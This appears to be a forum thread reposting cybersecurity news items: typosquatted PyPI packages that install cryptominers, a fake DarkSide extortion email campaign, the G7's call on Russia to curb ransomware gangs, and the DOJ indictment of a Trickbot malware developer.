  12. This week, multiple malicious packages were caught in the PyPI repository for Python projects that turned developers' workstations into cryptomining machines. All malicious packages were published by the same account and tricked developers into downloading them thousands of times by using misspelled names of legitimate Python projects. Bash script pulls in miner A total of six packages containing malicious code infiltrated the Python Package Index (PyPI) in April: maratlib maratlib1 matplatlib-plus mllearnlib mplatlib learninglib All came from user “nedog123” and the names of most of them are misspelled versions of the matplotlib legitimate plotting software. Ax Sharma, a security researcher at devops automation company Sonatype, analyzed the “maratlib” package in a blog post, noting that it was used as a dependency by the other malicious components. “For each of these packages, the malicious code is contained in the setup.py file which is a build script that runs during a package’s installation,” the researcher writes. While analyzing the package, Sharma found that it attempted to download a Bash script (aza2.sh) from a GitHub repository that is no longer available. Sharma tracked the author’s aliases on GitHub using open-source intelligence and found that the script’s role was to run a cryptominer called “Ubqminer” on the compromised machine. The researcher also notes that the malware author replaced the default Kryptex wallet address with their own to mine for Ubiq cryptocurrency (UBQ). In another variant, the script included a different cryptomining program that uses GPU power, the open-source T-Rex. Attackers are constantly targeting open-source code repositories like PyPI [1, 2, 3], the NPM for NodeJS [1, 2, 3], or RubyGems. Even if the detection comes when the download count is low, as it typically happens, there is a significant risk as developers may integrate the malicious code in widely used projects. In this case, the six malicious packages were caught by Sonatype after scanning the PyPI repo with its automated malware detection system, Release Integrity. At detection time, the packages had accumulated almost 5,000 downloads since April, with “maratlib” recording the highest download count, 2,371. __________________
  13. Attackers use DarkSide's prominence to carry out social engineering attacks. A number of organizations in the oil, gas and food sectors have received threatening emails from cybercriminals posing as DarkSide. According to researchers at Trend Micro, attackers are using the notorious DarkSide ransomware to launch a socially engineered intimidation campaign. In emails, criminals warn victims that the group has successfully compromised their corporate network and stolen confidential information. The stolen data will be publicly available unless the company pays a ransom of 100 bitcoins (roughly $ 3.8 million). DarkSide usually provides evidence of confidential data theft, but in a recent campaign, scammers did not provide such guarantees. The campaign organizers also made the mistake of mentioning in emails the alleged previous DarkSide attacks, which have recently become popular in news headlines. So, the letters indicate an attack on the world's largest meat producer JBS, but the incident was associated with the REvil group (Sodinokibi), and not with DarkSide. As noted by experts, DarkSide operators usually demand from $ 200 thousand to $ 2 million, and not nearly $ 4 million, featured in the recent campaign. The campaign sent emails to businesses in Japan, Argentina, Australia, Canada, India and the United States, China, Colombia, Mexico, the Netherlands, Thailand and the United Kingdom. __________________
  14. G7 (Group of 7) leaders have asked Russia to urgently disrupt ransomware gangs believed to be operating within its borders, following a stream of attacks targeting organizations from critical sectors worldwide. The G7 member states also expressed their commitment to work together to address the escalating and immediate ransomware threat as a global challenge. "We call on all states to urgently identify and disrupt ransomware criminal networks operating from within their borders, and hold those networks accountable for their actions," the G7 leaders (UK, USA, Canada, Japan, Germany, France, and Italy, plus the EU) said at the G7 Cornwall Summit. "In particular, we call on Russia [..] to identify, disrupt, and hold to account those within its borders who conduct ransomware attacks, abuse virtual currency to launder ransoms, and other cybercrime." This call to action comes after the White House National Security Council's chief cybersecurity adviser Anne Neuberger urged business leaders and corporate executives in early June to take ransomware attacks seriously. White House's public letter followed several attacks coordinated by ransomware gangs believed to be Russian-based. In early May, the DarkSide ransomware gang was behind an attack that forced Colonial Pipeline to shut down the largest pipeline in the US and pay a $5 million ransom. On the last day of May, the world's largest meat processor JBS was also forced to shut down production after REvil ransomware operators breached and encrypted some of its North American and Australian IT systems. The White House again declared the United States' commitment to battle ransomware operations together with the other G7 member states in a statement published over the weekend. "In just the last few weeks there have been several significant cyber intrusions affecting many G7 and other nations' critical infrastructure, manufacturing and electronics firms, and hospitals," the White House said. "The United States and our G7 partners are committed to working together to urgently address the escalating shared threat from criminal ransomware networks." Today, Lindy Cameron, the head of the UK's National Cyber Security Centre, also addressed this recent wave of ransomware attacks while speaking peaking at the RUSI Annual Security Lecture. "For the vast majority of UK citizens and businesses, and indeed for the vast majority of critical national infrastructure providers and government service providers, the primary threat is not state actors but cyber criminals, and in particular the threat of ransomware," Cameron added. "Reporting really matters – even if you are a victim and it's too late to limit the damage to your business, it helps us help others. All this not only helps make businesses resilient to ransomware, but to the full range of cyber threats they face, and deters adversaries by increasing the cost of an attack." __________________
  15. The US Department of Justice (DOJ) announced today that a Latvian national was charged for her alleged role as a malware developer in the Trickbot transnational cybercrime organization. Alla Witte (aka Max) was charged with 19 counts of a 47-count indictment after being arrested on February 6 in Miami, Florida. As a Trickbot malware developer, Witte wrote the code used by the malware to control, deploy, and manage payments of ransomware, the DOJ said in a press release published today. Witte also purportedly provided the Trickbot Group with the code needed to monitor and track authorized malware users and developed the tools and protocols required to store login credentials stolen from victims' networks. The case was investigated by the FBI's Cleveland Office and DOJ's Ransomware and Digital Extortion Task Force, created to battle the increasing number of ransomware and digital extortion attacks. "Witte and her associates are accused of infecting tens of millions of computers worldwide, in an effort to steal financial information to ultimately siphon off millions of dollars through compromised computer systems," FBI special agent Eric B. Smith said. The Trickbot malware Trickbot is a malware strain first spotted in October 2016 as a modular banking trojan that has been continuously upgraded with new modules and features since then. Even though initially used only for harvesting sensitive data, Trickbot has slowly evolved into a highly dangerous malware dropper used to deliver additional, usually a lot more dangerous, malware payloads on infected devices. This regularly happens after all sensitive information (system info, credentials, and any interesting files) has been collected and exfiltrated to attacker-controlled servers. On October 12, Microsoft and several partners announced that they took down some Trickbot C2s. The US Cyber Command also reportedly tried to cripple the botnet before the presidential elections by pushing a configuration file to infected devices to cut them off from the botnet's C2 servers. However, despite these coordinated attacks against TrickBot's infrastructure, the TrickBot gang's botnet is still active, and the group is still releasing new malware builds. The TrickBot gang is known for distributing Ryuk and Conti ransomware onto the compromised network of valuable corporate targets. "Trickbot infected millions of victim computers worldwide and was used to harvest banking credentials and deliver ransomware," Deputy Attorney General Lisa O. Monaco said today. "The Trickbot malware was designed to steal the personal and financial information of millions of people around the world, thereby causing extensive financial harm and inflicting significant damage to critical infrastructure within the United States and abroad," Acting US Attorney Bridget M. Brennan of the Northern District of Ohio added. __________________
  • Create New...